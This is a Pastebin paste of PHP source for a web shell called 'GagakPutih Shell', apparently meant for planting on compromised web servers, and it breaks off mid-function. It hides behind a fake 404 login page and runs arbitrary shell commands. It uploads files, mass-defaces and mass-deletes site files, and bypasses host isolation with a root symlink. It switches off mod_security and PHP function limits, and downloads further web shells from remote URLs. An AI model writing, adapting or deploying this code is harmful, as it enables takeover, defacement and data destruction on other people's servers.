jamesbeaulieu15

james01

Jul 6th, 2018
270
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 249.44 KB | None | 0 0
  1. <?php
  2. set_time_limit(0);
  3. error_reporting(0);
  4.  
  5. $auth_pass = "fde617d55b319bbea2d839b46a5876ae";
  6. if(get_magic_quotes_gpc()) {    
  7. function VEstripslashes($array) {       return is_array($array) ? array_map('VEstripslashes', $array) : stripslashes($array);   }  
  8. $_POST = VEstripslashes($_POST);
  9. $_COOKIE = VEstripslashes($_COOKIE); }
  10.  
  11.  
  12. function Login() {
  13.     die("
  14. <html><head><title>404 Not Found</title></head>
  15. <style>
  16. input { margin:0;background-color:#fff;border:1px solid #fff; }
  17. </style>
  18. <body>
  19. <h1>Not Found</h1>
  20. <p>The requested URL  was not found on this server.</p><hr>
  21. <form method=post>
  22. <input type=password name=pass></form></body></html>");
  23. }
  24.  
  25. function VEsetcookie($k, $v) {
  26.     $_COOKIE[$k] = $v;
  27.     setcookie($k, $v);
  28. }
  29.  
  30. if(!empty($auth_pass)) {
  31.     if(isset($_POST['pass']) && (md5($_POST['pass']) == $auth_pass))
  32.         VEsetcookie(md5($_SERVER['HTTP_HOST']), $auth_pass);
  33.  
  34.     if (!isset($_COOKIE[md5($_SERVER['HTTP_HOST'])]) || ($_COOKIE[md5($_SERVER['HTTP_HOST'])] != $auth_pass))
  35.         Login();
  36. }
  37. ?>
  38. <!DOCTYPE HTML>
  39. <HTML>
  40. <HEAD>
  41. <link href="" rel="stylesheet" type="text/css">
  42. <title>GagakPutih Shell </title>
  43. <style>
  44. body{
  45. background: #000000 url(https://lh6.googleusercontent.com/-uRLX3SeDrdI/TjBpUFR5oeI/AAAAAAAAAIo/GYSnWQxGWMc/cok.gif) scroll repeat center center;
  46. color:#3dff01;
  47. }
  48. li {
  49.     display: inline;
  50.     margin: 1px;
  51.     padding: 1px;
  52. }
  53. table{
  54. border: 3px #408b1a solid;
  55. }
  56. #content .first{
  57. background-color: #408b1a;
  58. }
  59.  #menu a {
  60.                 padding:2px 10px;  
  61.                 margin:0;
  62.                 background:#000000;
  63.                 text-decoration:none;
  64.                 letter-spacing:2px;
  65.                 padding: 2px 10px;
  66.                 margin: 0;
  67.                 background: #000000;
  68.                 text-decoration: none;
  69.                 letter-spacing: 2px;
  70.                 border-radius: 2px;
  71.                 border-bottom: 2px solid #3dff01;
  72.                 border-top: 2px solid #3dff01;
  73.                 border-right: 2px solid #00fd1e;
  74.                 border-left: 2px solid #00fd1e;
  75.        }
  76.        #menu a:hover {
  77.             background:#408b1a;
  78.             border-bottom:0px solid #000000;
  79.             border-top:0px solid #000000;
  80.        }
  81. a{
  82. color:#3dff01;
  83. text-decoration: none;
  84. }
  85. textarea{
  86. backgroud-color:#000000;
  87. color: #3dff01;
  88. }
  89. input,select{
  90. border: 1px #3dff01 solid;
  91. -moz-border-radius: 5px;
  92. -webkit-border-radius:5px;
  93. border-radius:5px;
  94. }
  95. </style>
  96. </HEAD>
  97.  
  98. <?php
  99. function w($dir,$perm) {
  100.     if(!is_writable($dir)) {
  101.         return "<font color=red>".$perm."</font>";
  102.     } else {
  103.         return "<font color=green>".$perm."</font>";
  104.     }
  105. }
  106. function exe($cmd) {
  107.     if(function_exists('system')) {        
  108.         @ob_start();       
  109.         @system($cmd);     
  110.         $buff = @ob_get_contents();        
  111.         @ob_end_clean();       
  112.         return $buff;  
  113.     } elseif(function_exists('exec')) {        
  114.         @exec($cmd,$results);      
  115.         $buff = "";        
  116.         foreach($results as $result) {         
  117.             $buff .= $result;      
  118.         } return $buff;    
  119.     } elseif(function_exists('passthru')) {        
  120.         @ob_start();       
  121.         @passthru($cmd);       
  122.         $buff = @ob_get_contents();        
  123.         @ob_end_clean();       
  124.         return $buff;  
  125.     } elseif(function_exists('shell_exec')) {      
  126.         $buff = @shell_exec($cmd);     
  127.         return $buff;  
  128.     }
  129. }
  130. function sulap($text) {
  131.   if(!get_magic_quotes_gpc()) {
  132.     return $text;
  133.     }
  134.   return stripslashes($text);
  135. }
  136. function ambilKata($param, $kata1, $kata2){
  137.     if(strpos($param, $kata1) === FALSE) return FALSE;
  138.     if(strpos($param, $kata2) === FALSE) return FALSE;
  139.     $start = strpos($param, $kata1) + strlen($kata1);
  140.     $end = strpos($param, $kata2, $start);
  141.     $return = substr($param, $start, $end - $start);
  142.     return $return;
  143. }
  144. function perms($file){
  145. $perms = fileperms($file);
  146. if (($perms & 0xC000) == 0xC000) {
  147. // Socket
  148. $info = 's';
  149. } elseif (($perms & 0xA000) == 0xA000) {
  150. // Symbolic Link
  151. $info = 'l';
  152. } elseif (($perms & 0x8000) == 0x8000) {
  153. // Regular
  154. $info = '-';
  155. } elseif (($perms & 0x6000) == 0x6000) {
  156. // Block special
  157. $info = 'b';
  158. } elseif (($perms & 0x4000) == 0x4000) {
  159. // Directory
  160. $info = 'd';
  161. } elseif (($perms & 0x2000) == 0x2000) {
  162. // Character special
  163. $info = 'c';
  164. } elseif (($perms & 0x1000) == 0x1000) {
  165. // FIFO pipe
  166. $info = 'p';
  167. } else {
  168. // Unknown
  169. $info = 'u';
  170. }
  171.  
  172. // Owner
  173. $info .= (($perms & 0x0100) ? 'r' : '-');
  174. $info .= (($perms & 0x0080) ? 'w' : '-');
  175. $info .= (($perms & 0x0040) ?
  176. (($perms & 0x0800) ? 's' : 'x' ) :
  177. (($perms & 0x0800) ? 'S' : '-'));
  178.  
  179. // Group
  180. $info .= (($perms & 0x0020) ? 'r' : '-');
  181. $info .= (($perms & 0x0010) ? 'w' : '-');
  182. $info .= (($perms & 0x0008) ?
  183. (($perms & 0x0400) ? 's' : 'x' ) :
  184. (($perms & 0x0400) ? 'S' : '-'));
  185.  
  186. // World
  187. $info .= (($perms & 0x0004) ? 'r' : '-');
  188. $info .= (($perms & 0x0002) ? 'w' : '-');
  189. $info .= (($perms & 0x0001) ?
  190. (($perms & 0x0200) ? 't' : 'x' ) :
  191. (($perms & 0x0200) ? 'T' : '-'));
  192.  
  193. return $info;
  194. }
  195. $_c7e = 'WGFpIFN5bmRpY2F0ZQ==';
  196. $sys = php_uname();
  197. $ip = gethostbyname($_SERVER['HTTP_HOST']);
  198. $sm = (@ini_get(strtolower("safe_mode")) == 'on') ? '<font>ON</font>' : '<font>OFF</font>';
  199. $getds = @ini_get("disable_functions");
  200. $ds = (!empty($getds)) ? "<font>$ds</font>" : "<font>NONE</font>";
  201. if(isset($_GET['path'])){
  202. $path = $_GET['path'];
  203. }else{
  204. $path = getcwd();
  205. }
  206. $path = str_replace('\\','/',$path);
  207. $paths = explode('/',$path);
  208. $home_r = $_SERVER['DOCUMENT_ROOT'];
  209. $_COPY = base64_decode($_c7e);
  210. if(get_magic_quotes_gpc()){
  211. foreach($_POST as $key=>$value){
  212. $_POST[$key] = stripslashes($value);
  213. }
  214. }
  215. if($_POST['upload']) {
  216.         if($_POST['tipe_upload'] == 'biasa') {
  217.             if(@copy($_FILES['ix_file']['tmp_name'], "$path/".$_FILES['ix_file']['name']."")) {
  218.                 $act = "<font color=green>Uploaded!</font> at <i><b>$path/".$_FILES['ix_file']['name']."</b></i>";
  219.             } else {
  220.                 $act = "<font color=red>Failed to upload file</font>";
  221.             }
  222.         } else {
  223.             $root = $_SERVER['DOCUMENT_ROOT']."/".$_FILES['ix_file']['name'];
  224.             $web = $_SERVER['HTTP_HOST']."/".$_FILES['ix_file']['name'];
  225.             if(is_writable($_SERVER['DOCUMENT_ROOT'])) {
  226.                 if(@copy($_FILES['ix_file']['tmp_name'], $root)) {
  227.                     $act = "<font color=green>Uploaded!</font> at <i><b>$root -> </b></i><a href='http://$web' target='_blank'>$web</a>";
  228.                 } else {
  229.                     $act = "<font color=red>Failed to upload file</font>";
  230.                 }
  231.             } else {
  232.                 $act = "<font color=red>Failed to upload file</font>";
  233.             }
  234.         }
  235.     }
  236.     echo "<center>Uploader :
  237.     <form method='post' enctype='multipart/form-data'>
  238.     <input type='radio' name='tipe_upload' value='biasa' checked>Biasa [ ".w($path,"Writeable")." ]
  239.     <input type='radio' name='tipe_upload' value='home_root'>home_root [ ".w($_SERVER['DOCUMENT_ROOT'],"Writeable")." ]<br>
  240.     <input type='file' name='ix_file'>
  241.     <input type='submit' value='upload' name='upload'>
  242.     </form>";
  243.     echo $act;
  244. echo '<center>
  245. <table width="700" align="center">
  246. <center>
  247. <form method="get">
  248. <select name="shell">
  249. <option value="">Shell Creator</option>
  250. <option value="wso">WSO Shell</option>
  251. <option value="idx">IDX Shell</option>
  252. <option value="b374k">B374K Shell</option>
  253. <option value="r57">R57 Shell</option>
  254. <option value="b374k">b374k Shell</option>
  255. <option value="blackhat">BlackHat Shell</option>
  256. <option value="noname">Noname Shell</option>
  257. </select>
  258. <input type="submit" value=">">
  259. </form>
  260. </center>
  261. ';
  262. echo'
  263. <div id="menu">
  264. <center>
  265. <ul>
  266. <li><a href="?">Home</a></li>
  267. <li><a href="?path='.$path.'&GagakPutih=info">System Info</a></li>
  268. <li><a href="?path='.$path.'&GagakPutih=config">Config Grab</a></li>
  269. <li><a href="?path='.$path.'&GagakPutih=crkcp">Cp Crack</a></li>
  270. <li><a href="?path='.$path.'&GagakPutih=jumping">Loncat</a></li>
  271. <li><a href="?path='.$path.'&GagakPutih=symlink">Symlink</a></li>
  272. <li><a href="?path='.$path.'&GagakPutih=adminer">Adminer</a></li><br><br>
  273. <li><a href="?path='.$path.'&GagakPutih=network">BackConnect</a>
  274. <li><a href="?path='.$path.'&GagakPutih=mail">Mailer</a></li>
  275. <li><a href="?path='.$path.'&GagakPutih=edituser">Auto Edit User</a></li>
  276. <li><a href="?path='.$path.'&GagakPutih=zoneh">Zone-H</a></li>
  277. <li><a href="?path='.$path.'&GagakPutih=defid">Defacer.id</a></li>
  278. <li><a href="?path='.$path.'&GagakPutih=symconfig">SymConfig</a></li><br><br>
  279. <li><a href="?path='.$path.'&GagakPutih=disablefunc">Disable Functions</a></li>
  280. <li><a href="?path='.$path.'&GagakPutih=domains">Domain Views</a></li>
  281. <li><a href="?path='.$path.'&GagakPutih=hashid">Hash ID</a></li>
  282. <li><a href="?path='.$path.'&GagakPutih=bing">Bing Grab</a></li>
  283. <li><a href="?path='.$path.'&GagakPutih=mass_deface">Mass Tools</a></li><br><br>
  284. <li><a href="?path='.$path.'&GagakPutih=cmd">Ngobrol</a></li>
  285. <li><a href="?path='.$path.'&GagakPutih=csrfup">Csrf Exploiter</a></li>
  286. <li><a href="?path='.$path.'&GagakPutih=vhost">Bypass Vhost</a></li>
  287. <li><a href="?path='.$path.'&GagakPutih=logs">Pengaman Bro</a></li>
  288. <li><a href="?path='.$path.'&GagakPutih=kill">Kill Your Self</a></li>
  289. </ul></center></div>';
  290. echo '
  291. <br>
  292. <table width="700" align="center">
  293. <tr><td><font color="white">Current Path :</font>';
  294. foreach($paths as $id=>$pat){
  295. if($pat == '' && $id == 0){
  296. $a = true;
  297. echo '<a href="?path=/">/</a>';
  298. continue;
  299. }
  300. if($pat == '') continue;
  301. echo '<a href="?path=';
  302. for($i=0;$i<=$id;$i++){
  303. echo "$paths[$i]";
  304. if($i != $id) echo "/";
  305. }
  306. echo '">'.$pat.'</a>/';
  307. }
  308. echo '</td></tr>';
  309. echo '</table>';
  310. if($_GET['GagakPutih'] == 'logout') {
  311. echo '<form action="?patch='.$path.'&do=logout" method="post">';
  312.     unset($_SESSION[md5($_SERVER['HTTP_HOST'])]);
  313.     echo 'Good Bye!!';
  314. } elseif($_GET['GagakPutih'] == 'cmd') {
  315. echo "<br><fieldset>";
  316.     echo "<form method='post'>
  317. <font style='text-decoration: underline;'>Command : </font>
  318. <input type='text' size='30' height='10' name='command'><input type='submit' name='c7ecmd' value='>>'>
  319.     </form> ";
  320.     if(isset($_POST['c7ecmd']))
  321. {
  322.  
  323. echo'<br><div style="background:#6d6d6d;margin:0px;padding:1px;text-align:left;color:lime;"><pre>';
  324. $cmd = $_POST['command'];
  325. if($cmd == "")
  326. {
  327.  
  328. echo "Please Insert Command!";
  329.  }
  330.  
  331. elseif(isset($cmd))
  332.  {
  333.  $output = exe($cmd);
  334.  echo $output; }
  335. echo'</pre></div><br><br>';
  336. }
  337. echo "</fieldset><br>";
  338. }elseif($_GET['GagakPutih'] == 'mass_deface') {
  339.     echo "<center><form action=\"\" method=\"post\">\n";
  340.     $dirr=$_POST['d_dir'];
  341.     $index = $_POST["script"];
  342.     $index = str_replace('"',"'",$index);
  343.     $index = stripslashes($index);
  344.     function edit_file($file,$index){
  345.         if (is_writable($file)) {
  346.         clear_fill($file,$index);
  347.         echo "<Span style='color:green;'><strong> [+] Nyabun 100% Successfull </strong></span><br></center>";
  348.         }
  349.         else {
  350.             echo "<Span style='color:red;'><strong> [-] Ternyata Tidak Boleh Menyabun Disini :( </strong></span><br></center>";
  351.             }
  352.             }
  353.     function hapus_massal($dir,$namafile) {
  354.         if(is_writable($dir)) {
  355.             $dira = scandir($dir);
  356.             foreach($dira as $dirb) {
  357.                 $dirc = "$dir/$dirb";
  358.                 $lokasi = $dirc.'/'.$namafile;
  359.                 if($dirb === '.') {
  360.                     if(file_exists("$dir/$namafile")) {
  361.                         unlink("$dir/$namafile");
  362.                     }
  363.                 } elseif($dirb === '..') {
  364.                     if(file_exists("".dirname($dir)."/$namafile")) {
  365.                         unlink("".dirname($dir)."/$namafile");
  366.                     }
  367.                 } else {
  368.                     if(is_dir($dirc)) {
  369.                         if(is_writable($dirc)) {
  370.                             if(file_exists($lokasi)) {
  371.                                 echo "[<font color=lime>DELETED</font>] $lokasi<br>";
  372.                                 unlink($lokasi);
  373.                                 $idx = hapus_massal($dirc,$namafile);
  374.                             }
  375.                         }
  376.                     }
  377.                 }
  378.             }
  379.         }
  380.     }
  381.     function clear_fill($file,$index){
  382.         if(file_exists($file)){
  383.             $handle = fopen($file,'w');
  384.             fwrite($handle,'');
  385.             fwrite($handle,$index);
  386.             fclose($handle);  } }
  387.  
  388.     function gass(){
  389.         global $dirr , $index ;
  390.         chdir($dirr);
  391.         $me = str_replace(dirname(__FILE__).'/','',__FILE__);
  392.         $files = scandir($dirr) ;
  393.         $notallow = array(".htaccess","error_log","_vti_inf.html","_private","_vti_bin","_vti_cnf","_vti_log","_vti_pvt","_vti_txt","cgi-bin",".contactemail",".cpanel",".fantasticodata",".htpasswds",".lastlogin","access-logs","cpbackup-exclude-used-by-backup.conf",".cgi_auth",".disk_usage",".statspwd","..",".");
  394.         sort($files);
  395.         $n = 0 ;
  396.         foreach ($files as $file){
  397.             if ( $file != $me && is_dir($file) != 1 && !in_array($file, $notallow) ) {
  398.                 echo "<center><Span style='color: #8A8A8A;'><strong>$dirr/</span>$file</strong> ====> ";
  399.                 edit_file($file,$index);
  400.                 flush();
  401.                 $n = $n +1 ;
  402.                 }
  403.                 }
  404.                 echo "<br>";
  405.                 echo "<center><br><h3>$n Kali Anda Telah Ngecrot  Disini </h3></center><br>";
  406.                     }
  407.     function ListFiles($dirrall) {
  408.  
  409.     if($dh = opendir($dirrall)) {
  410.  
  411.        $files = Array();
  412.        $inner_files = Array();
  413.        $me = str_replace(dirname(__FILE__).'/','',__FILE__);
  414.        $notallow = array($me,".htaccess","error_log","_vti_inf.html","_private","_vti_bin","_vti_cnf","_vti_log","_vti_pvt","_vti_txt","cgi-bin",".contactemail",".cpanel",".fantasticodata",".htpasswds",".lastlogin","access-logs","cpbackup-exclude-used-by-backup.conf",".cgi_auth",".disk_usage",".statspwd","Thumbs.db");
  415.         while($file = readdir($dh)) {
  416.             if($file != "." && $file != ".." && $file[0] != '.' && !in_array($file, $notallow) ) {
  417.                 if(is_dir($dirrall . "/" . $file)) {
  418.                     $inner_files = ListFiles($dirrall . "/" . $file);
  419.                     if(is_array($inner_files)) $files = array_merge($files, $inner_files);
  420.                 } else {
  421.                     array_push($files, $dirrall . "/" . $file);
  422.                 }
  423.             }
  424.             }
  425.  
  426.             closedir($dh);
  427.             return $files;
  428.         }
  429.     }
  430.     function gass_all(){
  431.         global $index ;
  432.         $dirrall=$_POST['d_dir'];
  433.         foreach (ListFiles($dirrall) as $key=>$file){
  434.             $file = str_replace('//',"/",$file);
  435.             echo "<center><strong>$file</strong> ===>";
  436.             edit_file($file,$index);
  437.             flush();
  438.         }
  439.         $key = $key+1;
  440.     echo "<center><br><h3>$key Kali Anda Telah Ngecrot  Disini  </h3></center><br>"; }
  441.     function sabun_massal($dir,$namafile,$isi_script) {
  442.         if(is_writable($dir)) {
  443.             $dira = scandir($dir);
  444.             foreach($dira as $dirb) {
  445.                 $dirc = "$dir/$dirb";
  446.                 $lokasi = $dirc.'/'.$namafile;
  447.                 if($dirb === '.') {
  448.                     file_put_contents($lokasi, $isi_script);
  449.                 } elseif($dirb === '..') {
  450.                     file_put_contents($lokasi, $isi_script);
  451.                 } else {
  452.                     if(is_dir($dirc)) {
  453.                         if(is_writable($dirc)) {
  454.                             echo "[<font color=lime>DONE</font>] $lokasi<br>";
  455.                             file_put_contents($lokasi, $isi_script);
  456.                             $idx = sabun_massal($dirc,$namafile,$isi_script);
  457.                         }
  458.                     }
  459.                 }
  460.             }
  461.         }
  462.     }
  463.     if($_POST['mass'] == 'onedir') {
  464.         echo "<br> Versi Text Area<br><textarea style='background:black;outline:none;color:red;' name='index' rows='10' cols='67'>\n";
  465.         $ini="http://";
  466.         $mainpath=$_POST[d_dir];
  467.         $file=$_POST[d_file];
  468.         $dir=opendir("$mainpath");
  469.         $code=base64_encode($_POST[script]);
  470.         $indx=base64_decode($code);
  471.         while($row=readdir($dir)){
  472.         $start=@fopen("$row/$file","w+");
  473.         $finish=@fwrite($start,$indx);
  474.         if ($finish){
  475.             echo"$ini$row/$file\n";
  476.             }
  477.         }
  478.         echo "</textarea><br><br><br><b>Versi Text</b><br><br><br>\n";
  479.         $mainpath=$_POST[d_dir];$file=$_POST[d_file];
  480.         $dir=opendir("$mainpath");
  481.         $code=base64_encode($_POST[script]);
  482.         $indx=base64_decode($code);
  483.         while($row=readdir($dir)){$start=@fopen("$row/$file","w+");
  484.         $finish=@fwrite($start,$indx);
  485.         if ($finish){echo '<a href="http://' . $row . '/' . $file . '" target="_blank">http://' . $row . '/' . $file . '</a><br>'; }
  486.         }
  487.  
  488.     }
  489.     elseif($_POST['mass'] == 'sabunkabeh') { gass(); }
  490.     elseif($_POST['mass'] == 'hapusmassal') { hapus_massal($_POST['d_dir'], $_POST['d_file']); }
  491.     elseif($_POST['mass'] == 'sabunmematikan') { gass_all(); }
  492.     elseif($_POST['mass'] == 'massdeface') {
  493.         echo "<div style='margin: 5px auto; padding: 5px'>";
  494.         sabun_massal($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
  495.         echo "</div>";  }
  496.     else {
  497.         echo "
  498.         <center><font style='text-decoration: underline;'>
  499.         Select Type:<br>
  500.         </font>
  501.         <select class=\"select\" name=\"mass\"  style=\"width: 450px;\" height=\"10\">
  502.         <option value=\"onedir\">Mass Deface 1 Dir</option>
  503.         <option value=\"massdeface\">Mass Deface ALL Dir</option>
  504.         <option value=\"sabunkabeh\">Sabun Massal Di Tempat</option>
  505.         <option value=\"sabunmematikan\">Sabun Massal Bunuh Diri</option>
  506.         <option value=\"hapusmassal\">Mass Delete Files</option></center></select><br>
  507.         <font style='text-decoration: underline;'>Folder:</font><br>
  508.         <input type='text' name='d_dir' value='$path' style='width: 450px;' height='10'><br>
  509.         <font style='text-decoration: underline;'>Filename:</font><br>
  510.         <input type='text' name='d_file' value='dc.php' style='width: 450px;' height='10'><br>
  511.         <font style='text-decoration: underline;'>Index File:</font><br>
  512.         <textarea name='script' style='width: 450px; height: 200px;'>Hacked By ./GagakPutih</textarea><br>
  513.         <input type='submit' name='start' value='Mass Deface' style='width: 450px;'>
  514.         </form></center>";
  515.         }
  516. } elseif($_GET['GagakPutih'] == 'vhost') {
  517.     echo "<form method='POST' action=''>";
  518.     echo "<center><br><font size='6'>Bypass Symlink vHost</font><br><br>";
  519.     echo "<center><input type='submit' value='Bypass it' name='Colii'></center>";
  520.         if (isset($_POST['Colii'])){ system('ln -s / Rintoar.txt');
  521.             $fvckem ='T3B0aW9ucyBJbmRleGVzIEZvbGxvd1N5bUxpbmtzDQpEaXJlY3RvcnlJbmRleCBzc3Nzc3MuaHRtDQpBZGRUeXBlIHR4dCAucGhwDQpBZGRIYW5kbGVyIHR4dCAucGhw';
  522.             $file = fopen(".htaccess","w+"); $write = fwrite ($file ,base64_decode($fvckem)); $Bok3p = symlink("/","Rintoar.txt");
  523.             $rt="<br><a href=Rintoar.txt TARGET='_blank'><font color=#ff0000 size=2 face='Courier New'><b>
  524.     Bypassed Successfully</b></font></a>";
  525.     echo "<br><br><b>Done.. !</b><br><br>Check link given below for / folder symlink <br>$rt</center>";} echo "</form>";
  526. } elseif($_GET['GagakPutih'] == 'csrfup')
  527. {  
  528. echo '<html>
  529. <center><h1 style="font-size:33px;">CSRF Exploiter By IndoXPloit<br>Recoded by Rinto AR</h1><br><br>
  530. <font size="3">*Note : Post File, Type : Filedata / dzupload / dzfile / dzfiles / file / ajaxfup / files[] / qqfile / userfile / etc</font>
  531. <br><br>
  532. <form method="post" style="font-size:25px;">
  533. URL: <input type="text" name="url" size="50" height="10" placeholder="http://www.target.com/path/upload.php" style="margin: 5px auto; padding-left: 5px;" required><br>
  534. POST File: <input type="text" name="pf" size="50" height="10" placeholder="Lihat diatas ^" style="margin: 5px auto; padding-left: 5px;" required><br>
  535. <input type="submit" name="d" value="Lock!">
  536. </form>';
  537. $url = $_POST["url"];
  538. $pf = $_POST["pf"];
  539. $d = $_POST["d"];
  540. if($d) {
  541.     echo "<form method='post' target='_blank' action='$url' enctype='multipart/form-data'><input type='file' name='$pf'><input type='submit' name='g' value='Upload'></form></form>
  542. </html>";
  543. }
  544. } elseif($_GET['GagakPutih'] == 'hashid') {
  545. if (isset($_POST['gethash'])) {
  546.         $hash = $_POST['hash'];
  547.         if (strlen($hash) == 32) {
  548.             $hashresult = "MD5 Hash";
  549.         } elseif (strlen($hash) == 40) {
  550.             $hashresult = "SHA-1 Hash/ /MySQL5 Hash";
  551.         } elseif (strlen($hash) == 13) {
  552.             $hashresult = "DES(Unix) Hash";
  553.         } elseif (strlen($hash) == 16) {
  554.             $hashresult = "MySQL Hash / /DES(Oracle Hash)";
  555.         } elseif (strlen($hash) == 41) {
  556.             $GetHashChar = substr($hash, 40);
  557.             if ($GetHashChar == "*") {
  558.                 $hashresult = "MySQL5 Hash";
  559.             }
  560.         } elseif (strlen($hash) == 64) {
  561.             $hashresult = "SHA-256 Hash";
  562.         } elseif (strlen($hash) == 96) {
  563.             $hashresult = "SHA-384 Hash";
  564.         } elseif (strlen($hash) == 128) {
  565.             $hashresult = "SHA-512 Hash";
  566.         } elseif (strlen($hash) == 34) {
  567.             if (strstr($hash, '$1$')) {
  568.                 $hashresult = "MD5(Unix) Hash";
  569.             }
  570.         } elseif (strlen($hash) == 37) {
  571.             if (strstr($hash, '$apr1$')) {
  572.                 $hashresult = "MD5(APR) Hash";
  573.             }
  574.         } elseif (strlen($hash) == 34) {
  575.             if (strstr($hash, '$H$')) {
  576.                 $hashresult = "MD5(phpBB3) Hash";
  577.             }
  578.         } elseif (strlen($hash) == 34) {
  579.             if (strstr($hash, '$P$')) {
  580.                 $hashresult = "MD5(Wordpress) Hash";
  581.             }
  582.         } elseif (strlen($hash) == 39) {
  583.             if (strstr($hash, '$5$')) {
  584.                 $hashresult = "SHA-256(Unix) Hash";
  585.             }
  586.         } elseif (strlen($hash) == 39) {
  587.             if (strstr($hash, '$6$')) {
  588.                 $hashresult = "SHA-512(Unix) Hash";
  589.             }
  590.         } elseif (strlen($hash) == 24) {
  591.             if (strstr($hash, '==')) {
  592.                 $hashresult = "MD5(Base-64) Hash";
  593.             }
  594.         } else {
  595.             $hashresult = "Hash type not found";
  596.         }
  597.     } else {
  598.         $hashresult = "Not Hash Entered";
  599.     }
  600. ?>
  601.     <center><br><Br><br>
  602.    
  603.         <form action="" method="POST">
  604.         <tr>
  605.         <table >
  606.         <th colspan="5">Hash Identification</th>
  607.         <tr class="optionstr"><B><td>Enter Hash</td></b><td>:</td>  <td><input type="text" name="hash" size='60' class="inputz" /></td><td><input type="submit" class="inputzbut" name="gethash" value="Identify Hash" /></td></tr>
  608.         <tr class="optionstr"><b><td>Result</td><td>:</td><td><?php echo $hashresult; ?></td></tr></b>
  609.     </table></tr></form>
  610.     </center>
  611. <?php
  612. } elseif($_GET['GagakPutih'] == 'domains'){echo "<center><div class='mybox'><p align='center' class='cgx2'>Domains and Users</p>";$d0mains = @file("/etc/named.conf");if(!$d0mains){die("<center>Error : can't read [ /etc/named.conf ]</center>");}echo '<table id="output"><tr bgcolor=#cecece><td>Domains</td><td>users</td></tr>';foreach($d0mains as $d0main){if(eregi("zone",$d0main)){preg_match_all('#zone "(.*)"#', $d0main, $domains);flush();if(strlen(trim($domains[1][0])) > 2){$user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0]));echo "<tr><td><a href=http://www.".$domains[1][0]."/>".$domains[1][0]."</a></td><td>".$user['name']."</td></tr>";flush();}}}echo'</div></center>';
  613. } elseif($_GET['GagakPutih'] == 'disablefunc'){
  614.         echo "<center>";
  615.         echo "<form method=post><input type=submit name=ini value='php.ini' />&nbsp;<input type=submit name=htce value='.htaccess' /></form>";
  616.         if(isset($_POST['ini']))
  617. {
  618.         $file = fopen("php.ini","w");
  619.         echo fwrite($file,"disable_functions=none
  620. safe_mode = Off
  621.     ");
  622.         fclose($file);
  623.         echo "<a href='php.ini'>click here!</a>";
  624. }       if(isset($_POST['htce']))
  625. {
  626.         $file = fopen(".htaccess","w");
  627.         echo fwrite($file,"<IfModule mod_security.c>
  628. SecFilterEngine Off
  629. SecFilterScanPOST Off
  630. </IfModule>
  631.     ");
  632.         fclose($file);
  633.         echo "htaccess successfully created!";
  634. }
  635.         echo"</center>";
  636. }elseif($_GET['shell'] == 'wso'){
  637.     $tools_dir = mkdir('Gagak_tools', 0755);
  638.     $file_tools = "Gagak_tools/wso.php";
  639.     $isi_httools = "<IfModule mod_security.c>
  640. SecFilterEngine Off
  641. SecFilterScanPOST Off
  642. </IfModule>";
  643.     $httools = fopen(".htaccess", "w");
  644.     $tools_script = file_get_contents("http://pastebin.com/raw.php?i=N0eh3Q7Y");
  645.     $tools = fopen($file_tools, "w");
  646.     fwrite($tools, $tools_script);
  647.     fwrite($httools, $isi_httools);
  648.     chmod($file_tools, 0755);
  649.     echo "Done <a href='Gagak_tools/wso.php'>WSO Shell Here</a>";
  650. }
  651. elseif($_GET['shell'] == 'idx'){
  652.     $tools2_dir = mkdir('Gagak_tools', 0755);
  653.     $file_tools2 = "Gagak_tools/idx.php";
  654.     $isi_httools2 = "<IfModule mod_security.c>
  655. SecFilterEngine Off
  656. SecFilterScanPOST Off
  657. </IfModule>";
  658.     $httools2 = fopen(".htaccess", "w");
  659.     $tools2_script = file_get_contents("http://pastebin.com/raw.php?i=nC6pWh5a");
  660.     $tools2 = fopen($file_tools2, "w");
  661.     fwrite($tools2, $tools2_script);
  662.     fwrite($httools2, $isi_httools2);
  663.     chmod($file_tools2, 0755);
  664.     echo "Done <a href='Gagak_tools/idx.php'>Idx Shell Here</a>";
  665. }
  666. elseif($_GET['shell'] == 'b374k'){
  667.     $tools3_dir = mkdir('Gagak_tools', 0755);
  668.     $file_tools3 = "Gagak_tools/b374k.php";
  669.     $isi_httools3 = "<IfModule mod_security.c>
  670. SecFilterEngine Off
  671. SecFilterScanPOST Off
  672. </IfModule>";
  673.     $httools3 = fopen(".htaccess", "w");
  674.     $tools3_script = file_get_contents("http://pastebin.com/raw.php?i=cR71LiMp");
  675.     $tools3 = fopen($file_tools3, "w");
  676.     fwrite($tools3, $tools3_script);
  677.     fwrite($httools3, $isi_httools3);
  678.     chmod($file_tools3, 0755);
  679.     echo "Done <a href='Gagak_tools/b374k.php'>b374k Shell Here</a>";
  680. }
  681. elseif($_GET['shell'] == 'sadrazam'){
  682.     $tools4_dir = mkdir('Gagak_tools', 0755);
  683.     $file_tools4 = "Gagak_tools/sadrazam.php";
  684.     $isi_httools4 = "<IfModule mod_security.c>
  685. SecFilterEngine Off
  686. SecFilterScanPOST Off
  687. </IfModule>";
  688.     $httools4 = fopen(".htaccess", "w");
  689.     $tools4_script = file_get_contents("http://pastebin.com/raw.php?i=xjKrnnBD");
  690.     $tools4 = fopen($file_tools4, "w");
  691.     fwrite($tools4, $tools4_script);
  692.     fwrite($httools4, $isi_httools4);
  693.     chmod($file_tools4, 0755);
  694.     echo "Done <a href='Gagak_tools/sadrazam.php'>Sadrazam Shell Here</a>";
  695. }
  696. elseif($_GET['shell'] == 'blackhat'){
  697.     $tools5_dir = mkdir('Gagak_tools', 0755);
  698.     $file_tools5 = "Gagak_tools/bh.php";
  699.     $isi_httools5 = "<IfModule mod_security.c>
  700. SecFilterEngine Off
  701. SecFilterScanPOST Off
  702. </IfModule>";
  703.     $httools5 = fopen(".htaccess", "w");
  704.     $tools5_script = file_get_contents("http://pastebin.com/raw.php?i=3L2ESWeu");
  705.     $tools5 = fopen($file_tools5, "w");
  706.     fwrite($tools5, $tools5_script);
  707.     fwrite($httools5, $isi_httools5);
  708.     chmod($file_tools5, 0755);
  709.     echo "Done <a href='Gagak_tools/bh.php'>Black Hat Shell Here</a>";
  710. }
  711. elseif($_GET['shell'] == 'r57'){
  712.     $tools6_dir = mkdir('Gagak_tools', 0755);
  713.     $file_tools6 = "Gagak_tools/r57.php";
  714.     $isi_httools6 = "<IfModule mod_security.c>
  715. SecFilterEngine Off
  716. SecFilterScanPOST Off
  717. </IfModule>";
  718.     $httools6 = fopen(".htaccess", "w");
